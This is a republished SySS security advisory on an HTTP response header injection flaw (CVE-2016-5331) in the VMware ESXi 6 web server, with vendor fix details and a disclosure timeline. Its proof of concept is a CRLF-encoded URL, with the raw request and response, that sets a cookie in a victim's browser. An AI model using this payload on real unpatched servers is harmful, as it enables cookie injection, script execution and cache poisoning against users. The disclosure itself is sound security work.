VMware vSphere Hypervisor (ESXi) HTTP Response Injection

2016-08-05T00:00:00
ID PACKETSTORM:138211
Type packetstorm
Reporter Matthias Deeg
Modified 2016-08-05T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2016-063  
Product: VMware vSphere Hypervisor (ESXi)  
Manufacturer: VMware, Inc.  
Affected Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1)  
VMware vCenter Server 6.0 U2  
Tested Version(s): VMware ESXi 6.0.0 build 3380124 (Update 1)  
Vulnerability Type: Improper Input Validation (CWE-20)  
Risk Level: Medium  
Solution Status: Fixed  
Manufacturer Notification: 2016-07-01  
Solution Date: 2016-08-04  
Public Disclosure: 2016-08-05  
CVE Reference: CVE-2016-5331  
Authors of Advisory: Matthias Deeg (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
VMware vSphere Hypervisor is a type-1 hypervisor for serving virtual  
machines.  
  
The manufacturer describes the product as follows (see [1]):  
  
"Virtualize even the most resource-intensive applications with peace of  
mind. VMware vSphere Hypervisor is based on VMware ESXi, the hypervisor  
architecture that sets the industry standard for reliability and  
performance."  
  
Due to improper input validation, the web server of VMware ESXi 6 is  
prone to HTTP response injection attacks.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The SySS GmbH found out that the web server of VMware ESXi 6 is   
vulnerable to HTTP response injection attacks, as arbitrarily supplied  
URL parameters are copied in the HTTP header Location of the server  
response without sufficient input validation.  
  
Thus, an attacker can create a specially crafted URL with a specific  
URL parameter that injects attacker-controlled data to the response  
of the VMware ESXi web server.  
  
Depending on the context, this allows different attacks. If  
such a URL is visited by a victim, it may for example be possible to  
set web browser cookies in the victim's web browser, execute arbitrary  
JavaScript code, or poison caches of proxy servers.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
The following URL is a simple attack vector to illustrate the HTTP  
response header injection vulnerability by setting an  
attacker-controlled session cookie named "test" with the value "31337"  
within the victim's web browser:  
  
https://<HOST>/?syss%0d%0aset-cookie:test=31337%0d%0at=1  
  
The corresponding HTTP GET request and the VMware ESXi web server  
response are as follows:  
  
GET /?syss%0d%0aset-cookie:test=31337%0d%0at=1 HTTP/1.1  
Host: <HOST>  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: close  
  
  
HTTP/1.1 303 See Other  
Date: Thu, 30 Jun 2016 15:12:23 GMT  
Connection: close  
Location: /?syss  
set-cookie:test=31337  
t=1/  
X-Frame-Options: DENY  
Content-Length: 0  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The manufacturer VMware has fixed the reported security vulnerability  
and disclosed detailed information about the issue and a software update  
for affected products in its security advisory VMSA-2016-0010 [4].  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2016-07-01: Vulnerability reported to manufacturer  
2016-07-01: Manufacturer acknowledges e-mail with SySS security advisory  
2016-07-14: Manufacturer further investigates the reported security  
issue  
2016-07-22: Manufacturer announces disclosure of this security issue  
2016-08-04: Public release of VMware security advisory VMSA-2016-0010  
and security update  
2016-08-05: Public release of SySS security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for VMware vSphere Hypervisor (ESXi)  
https://my.vmware.com/web/vmware/info/slug/datacenter_cloud_infrastructure/vmware_vsphere_hypervisor_esxi/6_0  
[2] SySS Security Advisory SYSS-2016-063  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-063.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy/  
[4] VMware Security Advisory VMSA-2016-0010   
http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was independently found and reported by  
Matthias Deeg of SySS GmbH, Vladimir Ivanov, Andrey Evlanin, Mikhail   
Stepankin, Artem Kondratenko, Arseniy Sharoglazov of Positive  
Technologies, Matt Foster of Netcraft Ltd, Eva Esteban Molina of   
A2secure and Ammarit Thongthua (see [4]).  
  
E-Mail: matthias.deeg (at) syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc  
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web   
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v2  
  
iQIcBAEBCgAGBQJXpF3hAAoJENmkv2o0rU2rJr0P/RYc3j268fzTLERUG5CvLKYV  
HNI1a4p2/Mg0lzc/n1/7aZOzX9eRQe0jVyFkv90/843IWCdofQU3aqLBwFSIsFZP  
C9Tv3JYpk4T68uzCIriqxqHgt+qza1evfmPTOP2RHua0iaOOQSohzY/cWo3Uc9Yj  
Qag+JmnwPWZJNzkL1i41F6oO6aKurM65XBtmAdKQVQwwJ1WYMpiM3vV71hIq18sO  
OSJOgKQQMAR/1U7UVd3IgFIUv4+2mdDPyEdlnzPiTtpmJvZQf8H3k9054auCWBWa  
U2WOesD5FsCS4nBmuvlTc+jALlqC2SRRgR1UpiEvXTYYunWrOFustGnj4fFvgg7S  
omtMdN8dnWdD6BXZXg2k/yVH0WToVWtwV0meKtSg9b0jOywKBVzoYO19vpchHaz4  
/Eyxd8HQHpToM3OgwHagFXosF3TGxwQySPlDHdQD5gYANzDBhS8uQ02Gwx2v9NCX  
cC/jbTDUC0fa2qNJL/wwN7unqmrdOkGEYlvTjme6wlDR5axB46GunSH5yNg5OKFl  
G1s7lZ+ZbcywBxScLx1k7ITa1tNL3PNet5/Ld6A1hi3yhONmRgkyfgB+YqN04xaR  
3b5U6eqnPfm8d52yVPa7zySVc1vN9mrQ87dCmnXWGE9xk++SXoeDLv3PbKrY65Iy  
w/x007duLbe7k/xSJ1Ip  
=/k7W  
-----END PGP SIGNATURE-----  
`